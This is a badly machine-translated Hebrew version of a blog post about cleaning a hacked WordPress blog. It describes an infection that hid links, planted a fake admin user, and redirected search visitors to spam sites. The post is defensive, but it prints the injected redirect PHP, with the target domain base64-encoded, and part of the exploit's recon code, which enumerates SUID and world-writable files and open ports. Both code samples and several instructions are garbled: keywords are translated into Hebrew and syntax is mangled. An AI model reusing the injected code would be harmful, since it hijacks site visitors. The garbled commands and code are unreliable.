הבלוגוספירה תפסה את הבאג ... אבל לי שהיה לך?

בחודש שעבר, אני כבר קיבל אזהרות הבלוג של וירוס ממבקרים מסוימים. בתחילה התעלמתי מהאזהרות, כי הייתי אנטי וירוס די טוב מותקן (קספרסקי AV 2009) ולמרות שהבלוג במשך זמן רב, מעולם לא קיבל התראת וירוס (.. ראיתי משהו חשוד מוקדם יותר כי הרענון הראשון נעלם. לבסוף ...).
לאט לאט החל להופיע וריאציות גדולות מבקר תנועהאחרי אשר לאחרונה נפל בהתמדה והתנועה החלה להיות יותר ויותר אנשים שאומרים לי stealthsettings.com זה virused. אתמול קיבלתי ממישהו מסך עשה כאשר האנטי וירוס חסם תסריט stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. זה היה משכנע מספיק בשבילי כי אני צריך לחפש כל המקורות. הרעיון הראשון שעלה במוחי היה לעשות שדרוג הגרסה האחרונה של וורדפרס (2.5.1), אך לא לפני שהתסריט הישן כדי למחוק את כל הקבצים של וורדפרס ולעשות מסד הנתונים גיבוי. הליך זה עד כה לא הצליח וכנראה היה לוקח זמן רב כדי להבין Sema שבו לזה לרתוח, אם הייתי אומר בדיון על כוס קפה, הוא מצא גוגל וזה יהיו טוב לראות אותו.
MyDigitalLife.info, פרסם מאמר שכותרתו: "האק וורדפרס: להתאושש תקן מנוע חיפוש של Google או לא קוקי התנועה הופנה אל Your-Needs.info, AnyResults.Net, Golden-Info.net אתרים אחרים שלא כדין"זה קצה החוט שהייתי צריך.
זה על לנצל וורדפרס מבוסס על עוגייהשלדעתי הוא מאוד מורכב נעשה לפי הספר. חכם מספיק כדי לעשות SQL Injection מסד הנתונים של הבלוג, כדי ליצור משתמש בלתי נראה בדיקה שגרתית פשוטה לוּחַ מַחווָנִים->משתמש, לבדוק את הספריות וקבצי שרת "לכתיבה" (עם chmod 777), לחפש ו לבצע קבצי הקבוצה עם הרשאות או שורש. אני לא יודע מה הוא שם EXPLOITAT ותראו שיש כמה מאמרים נכתבו עליו, למרות העובדה בלוגים רבים נגועים, כולל רומניה. אוקיי ... אני אנסה לנסות להסביר בהכללות על וירוס זה.

מהו הווירוס?

ראשית, הכנס את דפי מקור בבלוגים, מקשר בלתי נראה למבקרים אך גלוי לאינדקס עבור מנועי החיפוש, במיוחד גוגל. בדרך זו להעביר את דירוג דף לאתרים שצוינו על ידי התוקף. שנית, מוכנס קוד ניתוב מחדש כתובת אתר למבקרים המגיעים מגוגל, בשידור חי, יאהו, ... או קורא ה-RSS ולא באתר עוגייה. אנטי וירוס מזהה את ההפניה כ Trojan-Clicker.HTML.

תסמינים:

ירידה מסיבית בתנועת מבקר, במיוחד בבלוגים שבו רוב המבקרים מגיעים מגוגל.

זיהוי: (מכאן הפך בעיה למי שלא יודעים איך איך phpMyAdmin, PHP ו-Linux)

לוס אנג'לס. שימו לב! ראשית להפוך את מסד הנתונים גיבוי!

1. בדקו את קבצי המקור index.php, header.php, footer.php, נושא הבלוג ולראות אם יש קוד שמשתמש בהצפנה base64 או מכיל "אם (נסיוב $ ==" 1 && sizeof ($ _ COOKIE) == 0?) "כמו:

<? Php
סרף $ = מערך ( "google", "msn", "חי", "אלטה-ויסטה"
"תשאל", "יאהו", "AOL", "CNN", "מזג אוויר", "אלקסה");
$ Ser = 0; foreach ($ סרף כ$ REF)
אם (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ REF) == FALSE) {ser $ = "1;? לשבור;}!
אם (נסיוב $ == "? 1 sizeof && (_ $ COOKIE) == 0) {הכותרת (" ארץ: http: // ".base64_decode (" YW55cmVzdWx0cy5uZXQ = ') "/".); יציאה;
}>

... או משהו. מחק את הקוד הזה!

לחץ על תמונה ...

קוד מדד

בצילום המסך למעלה שבחרתי בטעות "<get_header PHP (); ?> ". קוד זה צריך להישאר.

2. להשתמש phpMyAdmin וללכת לשולחן באתר wp_usersאיפה לבדוק אם אין שם משתמש שנוצר על 00:00:00 0000-00-00 (מיקום אפשרי user_login אומר "וורדפרס". שים לב זיהוי המשתמש (בתחום ID) ולאחר מכן למחוק אותו.

לחץ על תמונה ...

משתמש מזויף

* הקו הירוק יש להסיר ושמר על הזהות שלו. במקרה של היה מזהה = 8 .

3. עבור לטבלה wp_usermeta, איפה ממוקם ו להסיר קווים לזיהוי (שבו השדה USER_ID ערך מזהה מופיע נמחק).

4. בטבלה wp_option, עבור active_plugins ותראה כי התוסף מופעל חשוד. ניתן להשתמש בו כמו סופים _old.giff, _old.pngg, _old.jpeg, _new.php.giffשילובי הרחבות וכו 'עם תמונה: פסקל _old ומזויף.

SELECT * FROM wp_options איפה option_name = 'active_plugins'

מחק את התוסף הזה, ואז ללכת הבלוג -> לוח בקרה -> Plugins, שבו כמה להשבית ולאפשר תוסף.

לחץ על התמונה כדי לראות כיצד וירוס בקובץ מופיע active_plugins.

חיבור

ללכת בדרך על ה-FTP או SSH, שמסומן בactive_plugins ולמחוק את הקובץ מהשרת.

5. הכל בphpMyAdmin, בלוח wp_option, מצא ולמחוק את השורה המכילה "rss_f541b3abd05e7962fcab37737f40fad8"ובין"internal_links_cache ".
בשנת internal_links_cache, הם נמצאים קישורים מוצפנים המופיעים בבלוג הספא וכן קוד גוגל אדסנס, ההאקר.

6. המומלץ הוא לשנות את הסיסמה שלך בלוג והתחברות להסיר את כל userele החשוד. שדרוג לגרסה העדכנית ביותר של בלוג WordPress ולהגדיר שלא לאפשר רישום של משתמשים חדשים. אין אובדן ... יכול להגיב ולא הגיוני.

ניסיתי להסביר מעל מעט, מה לעשות במצב כזה, לנקות בלוג וירוס זה. הבעיה היא יותר רצינית ממה שזה נראה ורחוק נפתר, המשמש פגיעויות אבטחה אירוח שרת האינטרנט, שהוא בלוג.

כצעד ראשון של ביטחון, עם גישה SSH, כדי לעשות כמה בדיקות על השרת כדי לראות אם יש קבצים כגון * ו * Pascal: פסקל _old *. * עם סופים.giff,. JPEG,. pngg,. jpgg. קבצים אלה יש למחוק. אם אנחנו לשנות שם של קובץ, למשל. top_right_old.giff in top_right_old.phpאנו רואים שהקובץ הוא בדיוק שרת קוד הניצול.

כמה סימנים שימושיים של בדיקה, ניקוי ושרת ביטחון. (דרך SSH)

1. cd / tmp ולבדוק אם יש תיקיות כמו tmpVFlma או שילובים אחרים של שמות כאחד ומחקו אותו. ראה המסך למטה, שתי התיקיות האלה לי:

tmpserver

שם תיקיית rm-rf

2. בדקו elimiati (שינוי chmod) כתכונות תיקיות אפשריות chmod 777

למצוא את כל הקבצים לצריבה בדיר נוכחי: מצא. סוג F-סלסול-2-LS
למצוא את כל המדריכים לצריבה בדיר נוכחי: מצא. סוג-D-סלסול-2-LS
למצוא את כל הספריות וקבצים לצריבה בדיר נוכחי: מצא. פרם--2-LS

3. מחפש קבצים חשודים בשרת.

מצא. -שם "* _new.php *"
מצא. -שם "* _old.php *"
מצא. "*. Jpgg", שם
מצא. -שם "* _giff"
מצא. -שם "* _pngg"

4, ATTENTION !!! את הקבצים שנקבעו קצת SUID si SGID. קבצים אלה לבצע עם הרשאות שימוש של המשתמש (קבוצה) או השורש, לא אלה של המשתמש הפעיל הקובץ. קבצים אלה יכולים להתפשר השורש, אם בעיות אבטחה. אם אינך משתמש SUID ו sgid קטעי קבצים, לבצע "chmod 0 " באו להסיר את החבילה המכילה אותם.

לנצל מכיל אי שם במקור ...:

אם (! $ safe_mode) {
אם (os_type $ == 'nix') {
$ Os = ביצוע ("sysctl-n kern.ostype ').
$ Os = ביצוע ("sysctl-n kern.osrelease ').
$ Os = ביצוע ("sysctl-n kernel.ostype ').
$ Os = ביצוע ("sysctl-n kernel.osrelease ').
אם $ למשתמש (, ($ למשתמש) ריק) = ביצוע ("id");
$ כינויים = מערך (
"=>",
"מצא קבצים SUID '=>' למצוא / -Type f -ls -Allows -04000 '
"מצא קבצים sgid '=>' למצוא / -Type f -ls -Allows -02000 '
"מצא את כל הקבצים לצריבה בדיר הנוכחי '=>' למצוא. -type f -ls -Allows -2 '
'מצא את כל הספריות לכתיבה בדיר נוכחי' => 'למצוא. -type ד -Allows -2 -ls '
'מצא את כל הספריות והקבצים לכתיבה בדיר נוכחי' => 'למצוא. -Allows -2 -ls '
'המופע נפתח יציאות' => 'netstat -an | grep -i להקשיב '
);
אחר} {
. Os_name $ = ביצוע ("ver ');
משתמש $ = ביצוע ("שם משתמש%% הד ').
$ כינויים = מערך (
"=>",
"הצג runing שירותים '=>' התחלה נקי"
'רשימת תהליך הצג' => 'tasklist'
);
}

... בעיקרון בדרך זו מוצאת פרצות אבטחה. פתיחת יציאות, ספריות "לצריבה" ולבצע קבצים עם הרשאות של הקבוצה / root.

חזור עם יותר ...

כמה בלוגים הנגועים: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / בלוג,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / בלוג /,

www.mirabilismedia.ro / בלוג, Blog.einvest.ro
... והרשימה עוד הארוכה ... הרבה.

אתה יכול לבדוק אם בלוג הוא וירוס באמצעות מנוע החיפוש של Google. העתק והדבק:

לקנות www.blegoo.com אתר

לילה טוב ולהגדיל את העבודה;) בקרוב אני אבוא עם אויגן חדשות על prevezibil.imprevizibil.com.

BRB :)

TO: שים לב! שינוי WordPress נושא או לשדרג WordPress 2.5.1, לא פתרון להיפטר של וירוס זה.

הבלוגוספירה תפסה את הבאג ... אבל לי שהיה לך?

על הסופר

התגנבות

תשוקה על כל דבר כלומר גאדג 'טים ו- IT, אני כותב עם stealthsettings הנאה מ 2006 ואני אוהב לגלות איתך דברים חדשים על מחשבים ומערכות הפעלה macOS, לינוקס, Windows, iOS ו- Android.

השאירו תגובה

אתר זה משתמש Akismet כדי להפחית דואר זבל. למד כיצד הנתונים שלך מעובדים.